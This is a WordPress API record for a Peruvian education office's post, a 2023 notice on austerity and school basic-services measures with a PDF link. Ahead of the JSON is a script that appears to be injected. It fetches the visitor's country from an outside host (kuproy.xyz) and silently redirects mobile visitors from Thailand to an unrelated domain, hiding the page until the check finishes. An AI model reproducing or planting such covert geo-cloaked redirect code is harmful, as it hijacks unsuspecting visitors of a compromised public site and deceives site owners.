<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":3388,"date":"2023-07-11T10:51:28","date_gmt":"2023-07-11T15:51:28","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=3388"},"modified":"2023-07-11T10:51:28","modified_gmt":"2023-07-11T15:51:28","slug":"comunicado-n-o-201-2023-disposiciones-de-austeridad-y-racionalidad-en-el-gasto-uso-de-los-servicios-basicos-y-medidas-ecoeficiencia-en-las-i-e-rd-03889-2023-servicios-basicos","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o-201-2023-disposiciones-de-austeridad-y-racionalidad-en-el-gasto-uso-de-los-servicios-basicos-y-medidas-ecoeficiencia-en-las-i-e-rd-03889-2023-servicios-basicos\/","title":{"rendered":"COMUNICADO N.\u00ba 201 \u2013 2023 \u2013 DISPOSICIONES DE AUSTERIDAD Y RACIONALIDAD EN EL GASTO, USO DE LOS SERVICIOS B\u00c1SICOS Y MEDIDAS ECOEFICIENCIA EN LAS I.E.(RD 03889-2023-SERVICIOS BASICOS)"},"content":{"rendered":"\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/07\/RD-03889-2023-SERVICIOS-BASICOS.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de RD-03889-2023-SERVICIOS-BASICOS.\"><\/object><a id=\"wp-block-file--media-06241ee9-a89c-4342-aaf6-671fc104ff96\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/07\/RD-03889-2023-SERVICIOS-BASICOS.pdf\">RD-03889-2023-SERVICIOS-BASICOS<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2023\/07\/RD-03889-2023-SERVICIOS-BASICOS.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-06241ee9-a89c-4342-aaf6-671fc104ff96\">Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,9,8],"tags":[],"class_list":["post-3388","post","type-post","status-publish","format-standard","hentry","category-comunicados","category-gestion-institucional","category-gestion-pedagogica"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=3388"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3388\/revisions"}],"predecessor-version":[{"id":3390,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/3388\/revisions\/3390"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=3388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=3388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=3388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}